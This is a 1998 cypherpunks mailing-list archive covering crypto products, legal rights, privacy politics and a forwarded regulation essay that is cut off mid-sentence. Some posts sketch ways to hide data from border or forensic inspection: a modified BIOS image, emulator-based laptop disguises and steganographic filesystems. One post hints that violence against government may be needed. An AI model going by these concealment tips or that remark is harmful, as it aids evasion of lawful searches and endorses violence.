> http://www.house.gov/traficant/
> 
> E-mail: telljim@mail.house.gov  (Rep. Jim Traficant D-OH)
> 
> 
> AN AMERICA WITH TWO LEGAL STANDARDS IS AN AMERICA WITH NO LEGAL
> STANDARDS
>               September 15, 1998
> 
> Mr. Speaker, if Joe Q. Citizen lied in a civil trial, he would be sued
> for every penny. If Joe Q. Citizen lied to a Grand Jury, he would go to
> jail. Lying is perjury. Perjury is a crime.
> 
> Now, having said that, what is going on here, Mr. Speaker? Does America
> now have two legal standards, one for you, one for  me; one for he, one
> for she; one for generals, one for soldiers; one for Presidents, one for
> residents?
> 
> Let us tell it like it is. Joe Q. Citizen cannot apologize, Joe Q.
> Citizen is not censured, Joe Q. Citizen is prosecuted. And let me warn
> Congress: An America with two legal standards is an America with no
> legal standards.
> 
> Mr. Speaker, I yield back the balance of the lives of all of the
> soldiers that gave their lives fighting to preserve our freedom.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 23 Sep 1998 10:14:22 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Other ways to mod the BIOS...
Message-ID: <199809231543.KAA10866@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



There is also the potential to mod the BIOS in a hot environment.

Shadow the BIOS to RAM, use a program on your hard-drive that mod's that
image and does a soft-reboot so the BIOS image is unaffected (since we're
mod'ing the BIOS image why do it half-assed) and suddenly your 'hidden'
whatever is sitting there.

You could do it while the system is online even if you're careful not
to mod anything but the BIOS image.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 23 Sep 1998 10:48:12 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <3.0.3.32.19980924170248.006b469c@pop.ctv.es>
Message-ID: <v04011702b22ec715979b@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:02 AM -0500 9/24/98, Albert P. Franco, II wrote:

>I think perhaps a tougher question is, "Is there a way, without resorting
>to bloodshed, to regain control of our private property and private lives?"
>That's not a troll! I know that there are a lot people on this list with
>their assault rifles at the ready, that are convinced that only armed
>resistance will work. But. I think that's the "easy" way out. (How) can it
>be done another way? Especially, given the fact that so much progress has
>already been made by the very Anti-American US Government and others.

	There is no way to make an omlete without opening the Eggshell.
There might be less violent methods than cracking it with a 5 pound hammer,
but the shell has to get cracked.

>How do we get back our civil rights that have been so eroded over the past
>40 years? Is it too late? Are people in general so comfortable that liberty
>isn't important anymore?

	Pretty much.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bram <bram@gawth.com>
Date: Wed, 23 Sep 1998 13:10:16 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <4.0.2.19980923070056.0096b380@mail.visi.com>
Message-ID: <Pine.LNX.3.96.980923111559.11906A-100000@blackbox>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 23 Sep 1998, Bruce Schneier wrote:

> Sorry.  I am under NDA.  Hopefully Arcot will explain sooner rather than
> later. I suggest not using the product until you are satisfied.

I'd say the following has been well established by now - 

- The people at ArcotSign are not completely clueless

- They're doing things in a possibly sub-optimal way as far as publically
explaining their algorithms, but this is a decision on their part, it's
not that they don't have reasonable algorithms to back things up

- They're not releasing due to being afraid of people copying their
product before they've gotten sufficiently far in development/achieved
some market penetration. Those of you who don't work at startups might not
be familiar with this sort of thinking, but it's completely reasonable -
if you go around telling everybody all the little details of how to make
things work, some large company might make a very quick bastardized
version and throw lots of marketing oomph behind it.

- Their marketing materials are a bit misleading. This they can reasonably
be faulted for.

In short, at worst it's a poor product, but not 'snake-oil'. I have no
idea whether it's a *good* product, since I've never looked at it, but for
all I know it might be the greatest thing since sliced bread.

I think that pretty much sums up everything there is to currently say on
the subject, until ArcotSign releases more details.

-Bram

(Who isn't talking about what he's working on until the official release
of a reasonably well fleshed-out product comes out.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 23 Sep 1998 10:51:52 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809231511.KAA10445@einstein.ssz.com>
Message-ID: <360918AC.AFB13B40@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> > controller, or you build a CPU emulator.  There is one that's > > freely available
> > called Bochs which will do this.  They can happily boot from their floppy
> > and talk directly to your virtual "hardware" and you still get through.
> 
> How do you propose to start this hardware emulator when it's boot file isn't
> on their boot floppy?

Simple.  You set the bios to boot off the hard drive.  You could even set your
notebook to sleep, then when they ask you to turn it on, you wake it and have
your emulator boot from the floppy.  This is especially effective if you
scratch up the case of your notebook and make it look older by modifying it's
case to look like it's a 486 or 386 to account for the difference in speed.

Shit, if you had the source to something like SoftPC or Virtual PC, you could
modify it to work on a Mac notebook (of course the nice Apple Logo would give
you away, but I'm sure you can figure out how to modify the case and the apple
keys.)
 
> And you think customs agents using software and TEMPEST signature scanning
> is out in the woods....

I'll worry about them using TEMPEST scanners when I hear reports that say
they're using it.  Until such time, you're being overly paranoid.

Until they start, this point is moot.  In any case the answer to that silly
idea is tempest shield your box, but include RF transmitters in various places
outside the shielding to emit the frequencies that a normal unaltered notebook
would transmit.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 23 Sep 1998 14:21:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: This is a listed crime?
In-Reply-To: <3.0.5.32.19980922231717.0090ba10@idiom.com>
Message-ID: <v03130312b22ef9560576@[209.133.20.24]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:04 AM -0700 9/23/98, attila wrote:

>    Duncan is correct in that they can not make you talk; but as
>    you point out, there is the 48 hour issue, and bogus charges
>    which are throwaways, if need be. they are the keeper, you are
>    the kept.
>
>    that was part of the point I was making; but they can also charge
>    you with obstruction of justice which is one of those were you
>    are really left with the burden of proof, not them. it is a whole
>    easier to defend a guilty party than it is to defend a party who
>    been unjustly charged --as a form of coercion or politics. if their
>    is no guilt, on what basis do you defend other than mistaken
>    identity and the corrupt officers are firm in their ID --you?

I believe this misstates the actual role of "obstruction of justice."

So far as I know, and I admit that I am not a lawyer and am not current on
case law, one cannot be charged with "obstruction of justice" for remaining
silent. O.J. Simpson, for example, was not charged thusly for not talking
(he of course stopped talking a few days after the murders, gave no further
interviews with the police and DA, and of course never testified in court).

Even Slick Willy is only being charged (by Starr) with obstruction of
justice for using his office to send out his underlings to propagate his
lies, and various things related to using his office to impede Starr's
investigation.

Merely asserting Fifth Amendment protections and Miranda rights should not,
except in Wonderland, trigger "obstruction of justice" charges. Though
we're almost in Wonderland, we're not quite there yet.

>    jury nullication is a serious risk.  judges believe they have the
>    right to define the rules under which you vote and are likely to
>    order serious sanctions or even time for defying his house rules.
>    I view it as a matter of Constitutional right and the choice of
>    arriving at the gate with the truth in hand.  I expect prosecutors
>    are including questions on nullification more often.  Aspen, or
>    Denver has a case know where a judge is nailing a juror who did not
>    volunteer the information she was an advocate of juror's right
>    -she did what I would suggest: showed up non-descript, and sat
>    there dumb and happy, and never objected to anything. it is
>    highly questionable that she was silent with the intention of
>    impeding justice.

I'll be interested to hear the outcome of this case.

I haven't been called as a juror since 25 years ago, but I certainly don't
plan to "volunteer" any information not requested of me. (And I may decide
not to even answer some questions they _do_ ask me. How we have come to a
situation where a court and jury consultants may ask highly personal
questions of prospective jurors is a sign of the train wreck that America
has become.)

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 22 Sep 1998 23:42:35 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: what is...
In-Reply-To: <199809220946.EAA09436@mixer.visi.com>
Message-ID: <Pine.GSO.3.96.980923122631.22783C-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



What is password salting ?

About the 64 bit key ....
  example I used the key uvietf31 does this mean it is converted to a 64
   bit 0's or/and 1's?


Thanks!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 23 Sep 1998 14:46:40 +0800
To: cypherpunks@cyberpass.net
Subject: George Santyana & crypto
Message-ID: <36094F13.EF0@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

I am reading http://www.jya.com/sig-attack.htm
---

  Then, in late 1942, the Royal Navy switched codes to the one-time
  pad system. The Nazi tap was lost forever because the
  pad system is unbreakable in both theory as well as practice.
  U-boats could no longer ambush helpless ships like wolves on
  sheep. Convoy after convoy arrived safe and intact, protected in the  
  armor of an unbreakable code system. The U-boats had
  to change tactics. http://www.us.net/softwar/

Germany used the enigma algorithm and machine.

Japan used the purple algorithm.

And look what happened to them.

About crypto algorithms.

        "Those who cannot remember the past are doomed to repeat
         it."     
                           -- George Santyana, 1905

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Tue, 22 Sep 1998 21:31:22 +0800
To: cypherpunks@cyberpass.net
Subject: German court: DES is no good
Message-ID: <90651796017802@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



http://www.thestandard.net/articles/display/0,1449,1780,00.html
 
German Court Ruling Another Blow To U.S. Encryption Standard
By Mary Lisbeth D'Amico
 
MUNICH - A German district court has ordered a bank in Frankfurt to repay a 
customer 4,543 marks (US$2,699) for money withdrawn from her bank account 
after her bank card was stolen.
 
The decision, made public Monday, again points to the holes in the 56-bit 
encryption technology used in Eurocheque cards, called EC Cards, according to 
the Chaos Computer Club, a German hackers group.
 
Calling the encryption technology for the EC bank cards "out-of-date and not 
safe enough," a Frankfurt District Court held the bank responsible for the 
amount stolen from the 72-year old plaintiff in February 1997. Neither the 
bank's name or that of the plaintiff were revealed.
 
An EC card is like a bank card which can be used at bank automats and 
point-of-sale terminals throughout Europe. The cards feature the U.S. 
government's data encryption standard, which uses 56-bit encrypted code to 
scramble the security information.
 
[Rest snipped]
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Oelzant <aoe@oeh.univie.ac.at>
Date: Wed, 23 Sep 1998 07:40:44 +0800
To: cypherpunks@toad.com
Subject: Re: Stego-empty hard drives...
Message-ID: <199809231233.OAA21978@prawda.oeh.univie.ac.at>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote:
> >Robert Hettinga wrote:
> >> Stegoing an encrypted partition as "blank" hard drive space without
> >> actually writing over it unless you wanted to?
> >> 
> >A freshly formatted partition has a fill value. Noise would indicate
> >that is is not fresh. This would not be proof that it contained
> >encrypted data but it would indicate some sort of use. 
> 
> It's really a shame how often MSMail files get corrupted,
> and how quickly the things can grow to 100-200MB if people from
> Marketing keep sending you mail with attached Powerpoint files.
> Does anybody know a compressed disk driver that lets you start
> at an arbitrary offset in a file so the headers look fine?

just installed the cryptfs patch for linux (from ftp://ftp.csua.berkeley.edu/
pub/cypherpunks/filesystems/linux/) which works nicely on 2.0.35 if you
mangle along the .rej files. it can use any offset
you want and also stego your fs if you like ... oh! wrong os for you?
then again you could certainly astonish your average customs officer
with it ... them probably not expecting your linux to use a ms file
for storage :-)

hth. alexander

-- 
aoe@oeh.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Sep 1998 16:44:03 +0800
To: cypherpunks@cyberpass.net
Subject: No Privacy for Privacy Hypocrites
Message-ID: <v0401174ab22f0d6c7517@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Oh, *this* is rich...

Cheers,
Bob Hettinga
--- begin forwarded text


Date: Wed, 23 Sep 1998 15:12:46 -0400 (EDT)
Reply-To: love@cptech.org
Originator: info-policy-notes@essential.org
Sender: info-policy-notes@essential.org
Precedence: bulk
From: James Love <love@cptech.org>
To: Multiple recipients of list INFO-POLICY-NOTES
<info-policy-notes@essential.org>
Subject: No Privacy for Privacy Hypocrites
MIME-Version: 1.0
X-Comment: To unsubscribe from this list, send the message "unsubscribe
info-policy-notes" to "listproc@essential.org".  Leave the "Subject:" line
blank.

No Privacy for Privacy Hypocrites


     A grass-roots citizen group is forming to address the
unrestrained assault on privacy represented by the Kenneth
Starr/Congressional investigations into President Clinton's sex
life.

     The group, named "No Privacy for Privacy Hypocrites," (on
the web at http://www.noprivacy.org) intends to make Congress
confront the privacy concerns that are raised by the
investigation, by asking Members of Congress to declare their own
standards regarding privacy, and deal with the consequences.

     The group is concerned that the investigation into the
President's sex life is having a negative impact on privacy that
will affect ordinary citizens.  "This whole sad affair is the
product of decades-long disrespect for privacy, for which our
political leaders are responsible," said Evan Hendricks, Editor
and Publisher of Privacy Times and one of the organizers of the
group.

     "This effort is intended to arrest the free fall of privacy
rights triggered by the stunning abuses of power by the Starr
investigation and the Congressional dissemination of personal
information," said Jamie Love.  "This should be a wake-up call
for Congress," said Gary Ruskin.

     On Monday, September 28, 1998, the group will distribute a
survey to Members of Congress asking:

     Do you believe any branch of government should investigate
     allegations that elected officials have committed adultery,
     including allegations that they have lied about it?

     If a Member answers yes or if the Member refuses to answer
the first question, then (and only then) they will be asked:

     Have you ever committed adultery, and have you ever lied
     about it?

     The survey is designed so that Members of Congress who
support privacy will not be asked about their own private lives.

     The answers to the survey will be placed on the web at
http://www.noprivacy.org, as soon the surveys are returned.


     CITIZEN INVOLVEMENT


     There are several ways people can participate in this
effort.

1.   You can join the group by sending a note to
     info@noprivacy.org.

2.   You can join an Internet discussion about the campaign by
     sending a note to listproc@essential.org, with the message:

     sub noprivacy Jane Doe

     (If your name is Jane Doe).

3.   You can offer suggestions for the web page, which needs some
     work.

4.   You can encourage your own Members of Congress to answer the
     survey.

For more information, see the No Privacy for Privacy Hypocrites
web page at http://www.noprivacy.org

     Organizers of the Committee gave different reasons for
joining.  Audrie Krause said "Wasn't there something in the New
Testament that says let he who is without sin cast the first
stone?  And since we are heading toward a public stoning, we
should ask, is anyone in Congress qualified to cast the first
stone?"

     Jim Warren, the well-known Internet activist, said:
"If politicians are going to compete with the Jerry Springer
Show, let's make sure that ALL of the best actors have an EQUAL
opportunity to expose their bedroom activities to the world.
. . . Any member of Congress who refuses to answer this simple
survey, but votes to pursue hearings about some other
politician's private sex-life, should be voted out of office."

     Catherine Gavin said "All this looks as if some people
in this country had decided to drive a car going faster and
faster, without caring that there were no brakes on the car.
Something has to be done before all of us get hurt in the final
crash. This is about a lot of things, but it is mostly about
privacy, or the prospect of living in a world with no privacy."


     Initial Organizing members of the Committee

     Initial Organizers of the Committee, which is an Ad Hoc
group, include:  Gary Ruskin, Marc Rotenberg, Jim Warren, Manon
Anne Ress, Jamie Love, Catherine Gavin, Audrie Krause, Noe
Hatchuel, Charles Bennington, Evan Hendricks.


     To contact the Committee, send email to info@noprivacy.org

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Sep 1998 16:44:19 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Microgov't: Old Red Tape Looks Good in Comparison
Message-ID: <v0401174bb22f0ecdc806@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Wed, 23 Sep 1998 07:51:20 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Microgov't: Old Red Tape Looks Good in Comparison
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Government Executive Magazine
http://www.govexec.com/dailyfed/0998/092398t2.htm

September 22, 1998

DAILY BRIEFING

The dawn of the era of microgovernment

By Jonathan Rauch, National Journal

On Feb. 12, Americans awoke to read in their newspapers
that the U.S. government-settler of the West, vanquisher of
totalitarianism, conqueror of the moon-now writes the rules of
golf.

Casey Martin is a professional golfer who suffers from
Klippel-Trenaunay-Weber syndrome, a congenital circulatory
disorder that gives him pain and swelling in his right leg.
Because Martin cannot walk the links, a federal judge ruled
that he had the right, under the 1990 Americans With
Disabilities Act, to play the PGA Tour using a golf cart. "Mr.
Martin is entitled to his modification because he is disabled,"
said Judge Thomas M. Coffin. "It will not alter what's taking
place out there on the course."

To Martin and the judge, this was a "reasonable
accommodation," fair to Martin and therefore required by law.
To the Professional Golfers' Association of America, it was an
unreasonable intrusion, unfair to all the players who must wear
themselves out trudging picturesquely from hole to hole. One
interesting question was whether walking is part of the game of
golf. A more interesting question, however, was how the
government got into the business of deciding whether walking is
part of the game of golf. This was a line of work that the most
ambitious New Deal economic planner would find startling.

Today, conservatives denounce law-making courts,
communitarians denounce the "rights industry," businesses
denounce the litigation explosion. Each critique has some merit,
as far as it goes; but this article posits that none of them goes
far enough. If you want to understand the full implications of the
Casey Martin phenomenon, you need to view it-and the
many thousands of other cases in which individuals and their
lawyers (or lawyers and their individuals) press rights-based
lawsuits-as nothing less than America's third and most
extraordinary wave of regulation. Call it microgovernment: a
style of regulating based on the premise that each individual is
entitled to a safe, clean or, especially, fair personal
environment.

Microgovernment is not the same thing as small
government-far from it. In fact, it is remarkably expansive
government, but its immensity takes the peculiar form of an
infinity of microdecisions, each building upon, yet separate
from, all the others. In this, it is radically different from earlier
periods of regulatory activism. The first two waves of
regulation dealt in big, clunky agencies issuing one-size-fits-all
rules aimed at making people better off, on the average.
Microgovernment comes as a steady drizzle of court decisions,
seeping through the pores of civic life. Regulatory agencies,
such as the Equal Employment Opportunity Commission, are
involved, but mostly as plaintiffs rather than as bureaucratic rule
makers. The main regulators are, indeed, not agencies at all,
but claimants and lawyers and judges and juries, all working
independently to spin, in the fashion of a mass of caterpillars, a
cocoon of intricate social regulation that enfolds even the most
minute details of everyday life.

"It's basically just an accumulation of micro-outcomes," says
Pietro S. Nivola, a political scientist at the Brookings Institution
(where I am a writer in residence). "You're not even setting
broad targets or goals. You add up a million cases, and that's
what you get."

So today, there is nothing unusual about waking up one
morning to find the government writing the rules of golf. The
New York State Board of Law Examiners is required to give
extra time on the bar exam to a woman who claims
(contestedly) to have a reading disability. A group of gay
municipal workers in Seattle is told it must include a hostile
heterosexual man who outspokenly believes in "biblical values."
A television production company is ordered to pay a $5 million
judgment for refusing to cast a visibly pregnant woman in the
role of a seductive vamp. The Supreme Court, in its majesty,
decides when a coach may and may not smack a football
player on the rump.

This article examines a cluster of familiar, sometimes
overfamiliar, goings-on and tries to look at them in a new way:
not as artifacts of jurisprudence but as a system of social
control. In other words, as regulation-but of a sort that has
eluded the scrutiny that regulation ordinarily gets.

Regulation, of course, is necessary, and no system is perfect,
and top-down, bureaucratic rule-making has more than its
share of problems. But microgovernment is fundamentally
different from other regulatory systems: It is less accountable,
less rational, and more intrusive than anything the New Deal or
the Great Society tried.

The Third Wave

In the standard account of things, there have been two great
and distinct waves of regulation in America, one now decrepit,
the other still robust. The first was economic regulation, which
began a century or so ago, in the days of the robber barons,
and lasted through the New Deal; the second was social
regulation, which blossomed in the 1960s and 1970s. Each
wave had its distinctive theory.

For the economic regulators, the problem was that markets
were unstable and prone to manipulation by cartels. The
solution was to establish agencies to control prices (passbook
interest rates, airfares, farm prices) and regulate entry into
markets (banking, communications, peanut-growing). For
social regulators, the problem was that markets dump social
harms ("externalities") on individuals who can't readily organize
to protect themselves. The solution was the creation of
agencies to reduce pollution (the Environmental Protection
Agency) or to act on behalf of consumers (the Consumer
Product Safety Commission), workers (the Occupational
Safety and Health Administration), drivers (the National
Highway Traffic Safety Administration).

Although the two waves were distinct, they had in common
their decision-making style, namely bureaucratic rule-making,
otherwise known as red tape. That is where the standard
history ends.

It is also where the third wave begins. Like the earlier two, the
third is rooted in a theory of market failure: that markets are
often unfair or hurtful. Its solution, however, breaks sharply
with the earlier two models, by rejecting the bureaucratic
model. Instead of looking to the executive branch to issue
rules, individuals (or agencies standing in for individuals) have
gone to court for redress. Under pressure from activists with
regulatory agendas and ordinary people with genuine
grievances, the courts have responded. In the 1960s and
1970s, a series of decisions broadened the traditionally narrow
tort laws to allow people to collect damages for more harms
and for more reasons. The result lies in a peculiar gray zone
between a traditional, negligence-based tort system and a
randomly enforced right to personal safety. Tillinghast-Towers
Perrin, a management consulting firm, reports that, from the
mid-1960s to the mid-1980s, tort costs more than doubled as
a share of the economy (to more than 2 percent), with lawyers
getting about 30 percent of the take and plaintiffs less than half.

In general, the tort system is not so much unreasonable (the
horror stories are exceptions) as ambitious. People howled in
1992 when a grandmother named Stella Liebeck spilled hot
coffee on herself and won a $2.7 million punitive judgment
against McDonald's. In fact, the case was not silly: Liebeck's
burns required hospitalization and skin grafts, McDonald's
acknowledged having received 700 prior burn complaints, and
the punitive judgment was eventually reduced to $480,000.

The larger significance, however, was that juries were
colonizing the territory previously reserved for bureaucrats and
politicians. A National Restaurant Safety Administration, if it
existed, could conduct rule-making to decide whether one burn
for every 24 million McDonald's coffees sold is a problem
worth worrying about, or whether, in the big scheme of things,
other safety problems are more important. In the court case,
however, the jury saw just a burned grandmother and an
arrogant corporation that had dismissed 700 burns as "trivially
different from zero."

"The case prompted McDonald's, and other restaurants, to
turn down the heat on the coffeepots," reported The Hartford
(Conn.) Courant. America must be the only country in the
world where juries regulate the temperature of coffee.

The people who worried that product-liability law was
becoming a right to safety were not particularly noticing that, on
a separate track, another series of lawsuits was establishing a
right to fairness. For instance, the courts waded into a swamp
of workplace-harassment litigation and embarked upon what
became an astonishingly ambitious regulatory project. The
courts construed the 1964 Civil Rights Act, which forbids
racial or sexual discrimination in the "compensation, terms,
conditions, or privileges of employment," as covering not just
hiring and firing and wages but as striking "at the entire
spectrum of disparate treatment of men and women in
employment." That was a pretty big spectrum, and striking at it
required, among other things, that each individual's workplace
environment be free of sexual harassment, as defined by juries
and judges. Other decisions established a parallel right to be
free of other forms of discriminatory harassment, which was left
for entrepreneurial plaintiffs and puzzled juries to define. The
chart on page 2152 shows the result: Federal
anti-discrimination lawsuits have almost tripled in this decade.

By 1998, regulating through the courts had become, in effect,
Washington's default mode. Why bother with a new
bureaucracy to regulate health maintenance organizations, when
you can just pass a "patients' bill of rights," meaning (in some
versions) regulating HMOs through private litigation? No need
to hire bureaucrats, make painful political choices or spend
taxpayers' money; regulation by lawsuit is self-financing and
self-propelled. "It's really a shift to off-budget governance,"
says Nivola. The trouble is that it is off-accountability, too.

Digging a Tunnel

Imagine that, instead of a Clean Air Act, with its endless rules
for sulfides and scrubbers, we just had a Clean Air Bill of
Rights: "No corporation or business establishment shall impose
an unfair, excessive or unreasonable burden of air pollution on
any person or group."

Then suppose that, instead of creating an EPA, we granted
everybody standing to sue for large sums of money. In effect,
we would give every individual the right to a clean set of lungs
and leave it to juries to decide what that means. Instead of
viewing, say, Los Angeles as a big patch of air containing 10
million people, we would view Los Angeles as 10 million pairs
of lungs, each equipped with a lawyer. The government's
perspective is inverted: What was seen from the top down, as
a large environment with many difficult trade-offs, is instead
seen from the bottom up-as 10 million microenvironments,
each to be regulated in its own right. It is this inversion of
perspective that distinguishes microgovernment from other
kinds of regulation, and that accounts for its often-bizarre
behavior.

Over the past few decades, economists and good-government
types have learned a thing or two about good regulatory
hygiene. Some of the basic rules are:

 Set an overall goal before putting particular rules in
 place;

 Target outcomes, not process-success means reducing
 pollution or reducing on-the-job injuries, not writing
 rules or levying fines;

 Look at the big picture; weigh overall social costs and
 benefits to avoid chasing wild geese (ever since the
 1970s, all major federal regulations are subject to
 cost-benefit review);

 Propose rules in advance (in the Federal Register), and
 give all affected interests plenty of time to comment;

 Write down the finished rules, and make them clear
 enough to comply with;

 Don't give bureaucrats a financial stake in their
 actions-for instance, don't let them pocket the fines
 they levy, lest they turn regulation into a money-making
 scheme;

 Allow for at least arm's-length supervision by politicians,
 so that Congress and the White House can hold
 regulators to account.

Our hypothetical Clean Air Bill of Rights offers not a single one
of those protections. Indeed, it regards them as irrelevant or
improper. Courts and juries can't target outcomes, because
they control only each particular case. There is no big goal, just
the million microgoals of justice in a million particular cases.
And so, with our imagined Clean Air Bill of Rights, particular
justice always trumps regulatory efficiency. The EPA can say,
"Air that is clean for 95 percent of the people is clean enough,"
but no self-respecting court can say to a plaintiff, "Because
other people's lungs are clean enough, you're not entitled to
clean lungs yourself." Clear rules, known in advance? No such
thing; instead, a million court decisions, often conflicting.
Cost-effectiveness? The mandate is to do justice, not to count
cash, and in any event, courts are neither equipped nor
expected to conduct economic analyses of the decisions they
reach. Disinterested regulators? The agenda is driven by angry
complainants and entrepreneurial lawyers who have everything
to gain from finding new behaviors to punish.

Through it all, the politicians are relegated to the peanut gallery
as commentators, except on the rare occasions when they
manage to rewrite a whole law, which is far harder to do than
summoning a regulator to testify before an oversight committee.
"An agency can be punished in a lot of different ways," says
Thomas F. Burke, a political scientist at Wellesley College.
"You can intimate that they're not going to get the same budget
through Congress next year. It's much harder to discipline
courts all across the country, and individuals who are bringing
lawsuits all across the country."

So what happens with our proposed Clean Air Bill of Rights?
Some juries do sensible things, such as finding for plaintiffs who
were exposed to high concentrations of lead. Other juries do
weird things, such as finding for plaintiffs who claim that trees
pollute. Some courts decide that an "unreasonable burden"
means a high likelihood of lung disease, but others decide that
"unreasonable burden" means more pollution in one area than in
another, or any pollution at all. Over the years, things settle
down a little, as precedents accumulate in each old area of
litigation, but meanwhile complainants keep opening new areas
of litigation. In any case, no one can be sure what the
environmental rules are, because no one knows what the next
jury may decide, or what the next plaintiff may dream up. The
result is what Burke has called a "floating legal crapshoot."
Anything could happen.

And anything does.

One-Eyed Regulating

In 1989, the Exxon Valdez spilled more than 10 million gallons
of oil into Alaska's Prince William Sound. The ship's captain,
Joseph Hazelwood, had been drinking (though a jury cleared
him of intoxication) and was known to have sought treatment
for an alcohol problem four years before the accident. In 1990,
with the Justice Department's encouragement, Exxon
established a policy barring employees with histories of drug or
alcohol abuse from 1,500 safety-sensitive jobs, "where an
accident could have catastrophic consequences"-about 10
percent of the company's positions. For people transferred out
of such jobs, the company tries to find positions of comparable
rank and pay. Nonetheless, the EEOC is now suing Exxon for
discrimination under the Americans With Disabilities Act
(ADA).

United Parcel Service requires that its delivery drivers, who
pop in and out of city traffic, have sight in both eyes. It, too, is
being sued by the EEOC under the disability act. Walter K.
Olson, a senior fellow at the Manhattan Institute for Policy
Research and the author of The Excuse Factory: How
Employment Law Is Paralyzing the American Workplace,
points out that this is not exceptional. Omaha paid $200,000 in
damages for refusing to rehire a policeman who had lost his
sight in one eye and had suffered loss of peripheral vision in
another; Northwest Airlines is being sued for declining to hire a
